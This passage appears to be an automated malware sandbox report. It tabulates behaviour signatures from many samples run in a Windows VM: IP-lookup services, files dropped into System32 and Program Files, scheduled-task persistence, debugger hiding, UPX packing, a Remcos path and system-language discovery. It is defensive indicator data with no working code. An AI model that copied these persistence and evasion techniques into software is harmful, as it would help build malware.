| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\GameBarPresenceWriter.exe | N/A |
Power Settings
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
| N/A | N/A | C:\Windows\system32\powercfg.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\DirectX\WebSetup | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\DirectX\WebSetup\filelist.dat | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\dsetup32.dll | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\SysWOW64\DirectX\WebSetup\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\SET71B2.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\SysWOW64\directx\websetup\SET71B2.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\dsetup.dll | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\directx\websetup\SET71C2.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\SysWOW64\directx\websetup\SET71C2.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3EUEYgl.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\3Y06E.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\f21.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-DCU30.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-AHIH9.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-N5V1T.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-PRVGE.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-2FP8S.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\back3.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\d1.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\ac2.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\Languages\is-HIV3C.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\Languages\is-T4OHF.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\x2.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\t1.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File created | C:\Program Files (x86)\Kuwait Ice Hockey DB\is-8KV2G.tmp | C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-GT5TL.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\w2.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-2S9QH.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\back.png | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\AnyDesk\AnyDesk.exe | C:\Users\Admin\AppData\Roaming\AnyDesk.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-FBO4V.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-QFNHP.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File opened for modification | \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.htm | C:\Users\Admin\Desktop\Files\wow.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-FGGQA.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-IBUCV.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\x1.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | C:\Users\Admin\AppData\Local\Temp\is-QISPR.tmp\KuwaitSetupHockey.tmp | N/A |
| File created | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-C95O9.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-SVBK7.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\w1.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File opened for modification | \??\c:\program files\common files\microsoft shared\stationery\funletters\greetings\wow.gif | C:\Users\Admin\Desktop\Files\wow.exe | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\ac1.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-F36PK.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-8ANHN.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-VFT99.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\Desktop\New Text Document mod.exse\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\is-35B8I.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-6ORKR.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\is-BKHF2.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File created | C:\Program Files (x86)\金瑞行情交易系统\Languages\is-AQET7.tmp | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\金瑞行情交易系统\ac3.bmp | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\123.0.6312.123\debug.log | C:\Program Files\Google\Chrome\Application\original.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| File created | C:\Windows\fonts\pssystem-regular.ttf | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\msdownld.tmp\AS5B91B3.tmp\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp\AS5B91B3.tmp\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\Desktop\Files\Mswgoudnv.exe | N/A |
| File created | C:\Windows\msdownld.tmp\AS5BC72B.tmp\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp\AS5BC72B.tmp\dxupdate.cab | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp\AS5BC72B.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File opened for modification | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
| File opened for modification | C:\Windows\fonts\pssystem-regular.ttf | C:\Program Files (x86)\金瑞行情交易系统\FuturesClient.exe | N/A |
| File opened for modification | C:\Windows\Logs\DirectX.log | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1a51J4.exe | N/A |
| File opened for modification | C:\Windows\msdownld.tmp\AS5B91B3.tmp | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| File created | C:\Windows\sysnldcvmr.exe | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Access Token Manipulation: Create Process with Token
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\mshta.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Installer Packages
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\pornhub_downloader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\jdrgsotrti.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\PORNHU~1.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\laz.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\surfex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\krgawdtyjawd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\surfex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\W4KLQf7.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\Mswgoudnv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\3dismhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bfe2cd46d6\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\onetap.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gnabpgw\wohcj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gnabpgw\wohcj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\Z9Pp9pM.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\fcxcx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gnabpgw\wohcj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\yiklfON.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\jy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\dxwsetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\M5iFR20.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Kuwait Ice Hockey DB\DataBase Kuwait.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\dismhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\surfex.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\systeminfo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\2dismhost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\twztl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\vcredist_x86.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\gnabpgw\wohcj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\Files\pghsefyjhsef.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\Desktop\New Text Document mod.exse\a\any_dsk.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\curl.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-RT8UM.tmp\jy.tmp | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\dwm.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\dwm.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\dwm.exe | N/A |
